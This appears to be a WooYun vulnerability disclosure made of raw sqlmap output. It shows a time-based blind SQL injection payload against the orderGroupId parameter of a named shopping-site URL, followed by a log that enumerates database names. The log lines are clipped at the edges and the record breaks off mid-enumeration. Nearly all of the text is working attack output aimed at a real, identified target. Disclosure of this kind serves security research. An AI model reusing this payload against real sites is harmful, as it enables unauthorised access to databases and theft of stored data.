WooYun.org

Place: GET
Parameter: orderGroupId
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: orderGroupId=3461349' AND SLEEP(5) AND 'SZZb'='SZZb
---
[11:43:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[11:43:49] [INFO] fetching database names
[11:43:49] [INFO] fetching number of databases
[11:43:49] [WARNING] time-based comparison needs larger statistical model.
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (o
'--time-sec')? [Y/n] y
[11:44:30] [WARNING] it is very important not to stress the network adapte
ndwidth during usage of time-based payloads
5
[11:44:37] [INFO] retrieved:
[11:44:43] [INFO] adjusting time delay to 1 second due to good response ti
in
[11:45:05] [ERROR] invalid character detected. retrying..
[11:45:05] [WARNING] increasing time delay to 2 seconds
fo
[11:45:47] [ERROR] invalid character detected. retrying..
[11:45:47] [WARNING] increasing time delay to 3 seconds
rmat
[11:47:04] [ERROR] invalid character detected. retrying..
[11:47:04] [WARNING] increasing time delay to 4 seconds
ion_schem
[11:50:23] [ERROR] invalid character detected. retrying..
[11:50:23] [WARNING] increasing time delay to 5 seconds
[11:50:42] [ERROR] invalid character detected. retrying..
[11:50:42] [WARNING] increasing time delay to 6 seconds
a
[11:51:15] [ERROR] unable to properly validate last character value ('  ')
[11:51:18] [INFO] retrieved: N
[11:51:37] [ERROR] invalid character detected. retrying..
[11:51:37] [WARNING] increasing time delay to 2 seconds
EW
[11:52:10] [ERROR] invalid character detected. retrying..
[11:52:10] [WARNING] increasing time delay to 3 seconds
MALL
[11:53:03] [INFO] retrieved: cm
[11:53:53] [ERROR] invalid character detected. retrying..
[11:53:53] [WARNING] increasing time delay to 4 seconds
s
[11:54:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
ing to retry the request
[11:54:42] [ERROR] invalid character detected. retrying..
[11:54:42] [WARNING] increasing time delay to 5 seconds
[11:54:53] [ERROR] invalid character detected. retrying..
[11:54:53] [WARNING] increasing time delay to 6 seconds
[11:55:04] [ERROR] unable to properly validate last character value ('').
[11:55:07] [INFO] retrieved: t
[11:55:24] [ERROR] invalid character detected. retrying..
[11:55:24] [WARNING] increasing time delay to 2 seconds
est
[11:56:06] [ERROR] invalid character detected. retrying..
[11:56:06] [WARNING] increasing time delay to 3 seconds
[11:56:09] [INFO] retrieved: u
[11:56:40] [ERROR] invalid character detected. retrying..
[11:56:40] [WARNING] increasing time delay to 4 seconds
[11:56:57] [ERROR] invalid character detected. retrying..
[11:56:57] [WARNING] increasing time delay to 5 seconds

http://mall.jia.com/gys/get_ab_order?orderGroupId=3461446